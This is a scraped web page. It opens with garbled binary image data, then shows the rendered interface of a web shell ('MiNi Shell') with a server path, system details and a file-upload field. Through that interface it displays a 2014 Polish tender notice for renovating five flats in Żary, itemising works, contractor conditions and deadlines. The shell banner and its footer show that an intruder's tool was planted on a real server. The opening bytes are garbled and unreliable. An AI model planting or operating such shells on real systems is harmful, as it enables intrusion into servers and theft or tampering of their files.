JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140919/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140919/312284-N-2014.html

<p class="kh_header"><b>Żary: Remont wolnych lokali mieszkalnych: Pow. Wielkopolskich 14a/6, Zakopiańska 1b/6, Młynarka 1/11, Lotników 11/6, Okrzei 78/3-3a</b><br>
<b>Numer ogłoszenia: 312284 - 2014; data zamieszczenia: 19.09.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Gospodarki Mieszkaniowej sp. z o.o. , ul. Zakopiańska 7, 68-200 Żary, woj. lubuskie, tel. 068 4791469, faks 068 4539004.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zgmzary.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: spółka z o.o..</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont wolnych lokali mieszkalnych: Pow. Wielkopolskich 14a/6, Zakopiańska 1b/6, Młynarka 1/11, Lotników 11/6, Okrzei 78/3-3a.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres remontu do wykonania w lokalu wolnym w Żarach przy ul. Pow. Wielk. 14A/6
L.p.	Opis remontu	J/m	Ilość
1.	uzupełnienie osprzętu elek. w lok. + uzupełnienie punku + pomiary	lok.	1
2.	wymiana kuchni węglowej przenośnej z wężownicą	szt.	1
3.	przestawienie piecy licowanych kaflami
 -/ 1 szt. w ścianie /	
szt. 	
2
4.	opina kominiarska dot. prawidłowości podłączenia piecy i sposobu zwentylowania lokalu	
szt.	
1
5.	wymiana skrzydeł drzwiowych wew. / dopasowanie do istniejących ościeżnic /	
szt.	
3
6.	łazienka - demontaż kabiny, wymiana - wc kompakt, umywalka kpl, wanna kpl z bateriami 	
lok.	
1
7.	naprawa i dopasowanie stolarki okiennej zesp. 	lok.	1
8.	wymiana drzwi wew. wraz z ościeżnicą / prawe / do kuchni - przeniesienie wyłącznika światła
montaż drzwi wew. / do dużego pokoju / wraz z ościeżnicą / lewe /	
szt.

szt.	
1

1
9.	sprawdzenie inst. c.o. w łazience / dot. podgrzewacza c.w.u. i grzejnika / - na szczelność  	
kpl.	
1
10.	wymiana szafki pod zlewozmywak, montaż zlewozmywa-ka, syfonu, baterii 	
lok.	
1
11.	wymiana instalacji wodnej 	lok.	1
12.	wymiana części posadzki z płytek cer. w pom. kuchni 
- uzupełnienie panelami podłogowymi wraz z listwami	
pom.	
1
13.	likwidacja grzejnika c.o. / w p. pokoju	szt.	1
14.	montaż nawietrznika pod oknem w pom. kuchni	szt.	1
15.	demontaż inst. RTV w lokalu, demontaż masztu RTV przy kominie	
szt.	
1
16.	skucie płytek cer. w łazience / ściany, posadzka /	pom.	   1
17.	przygotowanie pow. ścian pod malowanie , malowanie farbami olejnymi ścian / łazienka /	
pom.	
   1
18.	ułożenie płytek cer. na posadzce w łazience 	pom.	   1
19.	zerwanie tapet na ścianach i kasetonów, szpachlowanie 2x i malowanie farbami emulsyjnymi ścian i sufitów 2x	
lok.	
1
20.	malowanie stolarki okiennej, ościeżnic drzwiowych / sta-lowych / oraz lamperi w kuchni /	
lok.	
1
21.	pom. gospodarcze
- malowanie, uzupełnienie podsufitki, uzupełnienie inst. 
  elek.	

pom	

1

22.	
roboty na zew. lokalu;

- rozebranie prowizorycznych ścianki z desek
- przeniesienie wycieraczki pod drzwi wejściowe
- uzupełnienie brakującego polbruku w okolicy 
  wycieraczki
- naprawa i malowanie ścian elewacji od strony
   wejściowej do lokalu


- naprawa opaski betonowej 
- uzupełnienie rury spustowej / kolano pcv /
- naprawa oświetlenia numeru adm. / nowy klosz /
- uporządkowanie terenu przed lokalem + utylizacja
	


m2
szt.

m2

m2


mb
szt.
szt.

	


4
1

1

18

2
1
1



Zakres remontu do wykonania w lokalu wolnym w Żarach przy ul. Zakopiańska 1b/6
L.p.	Opis remontu	J/m	Ilość
1.	wymiana instalacji elektrycznej + pomiary	lok.	1
2.	rozebranie pieca kaflowego 	szt.	1
3.	wykonanie fundamentu pod piec	szt.	1
4.	postawienie pieca licowanego kaflami  / 8 warstw /	szt.	1
5.	opinia kominiarska dot. prawidłowości podłączenia	szt.	1
6.	osadzenie drzwi wejściowych do lok. / mat. miejsc. /
wraz z wyk. nadproża 	
szt.	
1
7.	wymiana inst. w-k + opomiarowanie / 1,5 m3/h /	lok.	1
8.	montaż szafki , zlewozmywaka ,zaworu czerpalnego	kpl.	1
9.	montaż kuchni gazowej 4 pal. z piekarnikiem gaz.	szt.	1
10.	wymiana inst. gazowej + próba szczelności + opinia	kpl.	1
11.	wymiana paneli podłogowych w pokojach	pom.	2
12.	ułożenie płyty OSB j. w. 	pom.	2
13.	rozebranie posadzki z płytek cer. w kuchni	pom.	1
14.	wykonanie warstwy wyrównawczej na posadzce 	pom.	1
15.	ułożenie wykładziny pcv w kuchni	pom.	1
16.	montaż listew podłogowych rozbieralnych	lok.	1
17.	szpachlowanie 2x ścian i sufitów - malowanie farbami emulsyjnymi w kolorach jasnych -usunięcie kasetonów	
lok.	
1
18.	ułożenie płytek cer. w pom. kuchni w zg. z uzg.	m2	4
19.	montaż napowietrznika w pom. kuchni / pod oknem /	szt.	1
20.	rozebranie ścianki / wejście do lokalu /	szt.	1
21.	rozebranie prowizorycznego wc + demontaż urządzeń 	kpl	1
22.	uzupełnienie podłogi po rozebraniu ścianki na kl. sch.	m2	2

23.	
wykonanie pom. wc 

- wykonanie ścianki z regipsu na stelażu 
- wykonanie podejścia pod wc
- wykonanie izolacji nieprzepuszczalnej 
- ułożenie płytek cer. na posadzce
- montaż kompaktu / wc /
- montaż drzwi do pom. wc
- szpachlowanie i malowanie
- inst. elek.	


m2.
szt.
pom
m2
kpl
kpl
pom.
pom.	


5
1
1
2,5
1
1
1
1


Zakres remontu do wykonania w lokalu wolnym w Żarach przy ul. Młynarska 1/11
L.p.	Opis remontu	J/m	Ilość
1.	wymiana drzwi wejściowych do lokalu	szt.	1
2.	montaż daszku nad wejście do lokalu	szt.	1
3.	przestawienie pieca licowanego kaflami	szt.	1
4.	wymiana wykładziny pcv w lokalu + listwy	pom.	1
5.	wymiana zlewozmywaka na szafce + bateria - naprawa szafki	
szt.	
1
6.	pomiary elek. w lokalu + montaż opraw oświetleniowych szt. 2 	
lok.	
1
7.	opinia kominiarska / prawidłowości podłączenia pieca /	szt.	1
8.	malowanie farbami emulsyjnymi lokalu	lok.	1
9.	remont wc zlok. na zew.	szt.	1

Zakres remontu do wykonania w lokalu wolnym w Żarach przy ul. Lotników 11/6
L.p.	Opis remontu	J/m	Ilość
1.	wymiana instalacji elektrycznej w lokalu + pomiary	lok.	1
2.	wymiana inst. gazowej + próba szczelności + opinia komi-niarska	kpl.	    1
3.	montaż kuchni gazowej 	szt.	1
4.	wymiana inst. w-k,	lok.	1
5.	montaż zlewozmywaka na szafce, baterii	kpl.	1
6.	opomiarowanie inst. wodnej - wodomierz o przepływie 1,5m3/h	
szt.	  
   1
7.	wymiana drzwi wejściowych do lokalu	szt.	1
8.	wymiana stolarki okiennej drewnianej na pcv	szt.	4
9.	wymiana parapetów okiennych wew. i zew.	szt.	8
10.	rozebranie pieca licowanego kaflami	szt.	1
11.	wykonanie fundamentu pod piec	szt.	1
12.	przestawienie pieca licowanego kaflami	szt.	1
13.	przestawienie trzonu kuchennego	szt.	1
14.	opinia kominiarska - wskazanie podłączenie trzonu i pieca oraz powykonawcza - wentylacji pomieszczenia	
szt.	
2
15.	zerwanie wykładziny pcv w pom. kuchni	pom.	1
16.	ułożenie płyty OSB i wykładziny w pom. kuchni + listwy	pom.	     1
17.	montaż paneli podłogowych w pom. pokój + listwy	pom.	1
18.	naprawa, spasowanie, malowanie stolarki drzwiowej wew.	szt.	     1
19.	2xszpachlowanie i malowanie farbami klejowymi pom.
oraz olejne w okolicy zlewozmywaka i trzonu	
lok.	
1
20.	toaleta na zewnątrz wspólna z innymi lokatorami -r em.	pom.	1


Zakres remontu do wykonania w lokalu wolnym w Żarach przy ul. Okrzei 78/3 - 3a
L.p.	Opis remontu	J/m	Ilość
1.	wymiana instalacji elektrycznej / jeden układ pomiarowy dla lok. 3 i 3a / + pomiary	
lok.	
1
2.	rozebranie piecy kaflowych	szt.	2
3.	wykonanie fundamentów pod piec	szt.	2
4.	postawienie pieca licowanego kaflami  / 8 warstw /	szt.	2
5.	opinia kominiarska dot. prawidłowości podłączenia	szt.	1
6.	wykucie ościeżnic drewnianych 
/ drzwi wejściowe do lok. / 	
szt.	
2
7.	zamurowanie otworów w murze z cegły gr 25cm i otynko-wanie / obustronnie / 	
m3	
   1,2
8.	wymiana inst. w-k + opomiarowanie / 1,5 m3/h /
/ w lok. nr 3a likwidacja /	
lok.	
1
9.	montaż szafki , zlewozmywaka ,zaworu czerpalnego	kpl.	1
10.	montaż kuchni gazowej 4 pal. z piekarnikiem gaz.	szt.	1
11.	wymiana inst. gazowej + próba szczelności + opinia
/ likwidacja w lok. nr 3a /	
kpl.	
1
12.	rozebranie ścianki działowej drew. / lok. nr 3a /	m2	12
13.	wymiana paneli podłogowych w lok. 3a	pom.	1

14.	
wymiana podłóg w lok. nr 3
- zerwanie wykładziny pcv
- ułożenie płyty OSB
- ułożenie paneli - pokój
- ułożenie wykładziny podłogowej - kuchnia
- montaż listew podłogowych - rozbieralnych 
  - lok. 3 i 3a 	
lok.	
1
15.	ułożenie płytek cer. w pom. kuchni w zg. z uzg.	m2	4
16.	montaż napowietrznika w pom. kuchni / pod oknem /	szt.	1

17.	wykucie otworu w murze gr 25 cm, wykonanie 
nadproża 	
szt.	
1

18.	osadzenie drzwi wew. - z kuchni do pokoju 90x200 L 
wymiana drzwi wew. - lok. 3 - 90x200
wymiana drzwi wejściowych - lok. 3 - 90x200 L	szt.
szt.
szt.	1
1
1

19.	wykonanie podsufitki z płyt regips na sufitach 
- lok. nr 3 / po pożarze /	
lok.	
1
20.	szpachlowanie 2x ścian i sufitów - malowanie farbami emulsyjnymi w kolorach jasnych -usunięcie kasetonów	
lok.	
1
21.	dopasowanie i oczyszczenie stolarki okiennej pcv	lok.	1
22.	zamontowanie kratki wentylacyjnej	szt.	1
23.	usunięcie i utylizacja gruzu	m3	2.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.30.00.00-0, 45.31.00.00-3, 45.33.00.00-9, 45.35.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 24.11.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie wykonawcy, spełnia/ nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie wykonawcy, spełnia/ nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie wykonawcy, spełnia/ nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie wykonawcy, spełnia/ nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie wykonawcy, spełnia/ nie spełnia, plus polisa OC</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo - w przypadku, o którym mowa w pkt. XVI ppkt 7 i 8</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w niżej wymienionych przypadkach:
1.1 ZMIANY OGÓLNE
Możliwa jest:
a) zmiana adresu/siedziby Zamawiającego/Wykonawcy;
b) zmiana osób występujących po stronie Zamawiającego/Wykonawcy.
1.2 ZMIANY RZUTUJĄCE NA TERMIN
1.2.1. Możliwa jest zmiana terminu wykonania umowy, ewentualnie wstrzymanie/wznowienie robót, ze względu na:
a) uzasadnione zmiany w zakresie sposobu wykonania przedmiotu zamówienia
proponowane przez Zamawiającego lub Wykonawcę, jeżeli te zmiany są korzystne
dla Zamawiającego,
b) konieczność oczekiwania Wykonawcy na dostawę zamówionej stolarki okiennej pod wa-runkiem zamówienia jej w ciągu pierwszych 5 dni roboczych od podpisania umowy oraz niezwłocznym poinformowaniu Zamawiającego o możliwym terminie odbioru stolarki okien-nej wykraczającym poza termin realizacji umowy. Zamawiający ma prawo weryfikacji termi-nów wykonania stolarki okiennej u innych producentów oraz w uzasadnionym przypadku odmowy wydłużenia terminu,
c) przedłużenie procedury przetargowej,
d) uwarunkowania społeczne (protesty, listy, petycje, itp.),
e) konieczność prowadzenia uzgodnień z właścicielami urządzeń obcych lub właścicielami nieruchomości,
f) technologię wykonywania robót,
g) zmiany stanu prawnego,
h) działania sił natury uznane za stan klęski żywiołowej,
i) działania osób trzecich uniemożliwiające wykonanie prac, które to działania nie są konse-kwencją winy którejkolwiek ze stron,
1.2.2. Wykonawca nie będzie miał prawa do przedłużenia terminu zakończenia umowy jeśli
przedłużenie terminu wynika z przyczyn leżących po stronie Wykonawcy.
2. ZMIANY RZUTUJĄCE NA WYNAGRODZENIE
Możliwa jest zmiana postanowień umowy w związku ze zmianą stawki podatku od towarów i
usług (VAT).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zgmzary.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 68-200 Żary, ul. Zakopiańska 7, pokój nr 7 - dział techniczny.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.10.2014 godzina 10:00, miejsce: 68-200 Żary, ul. Zakopiańska 7, pokój nr 7 - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com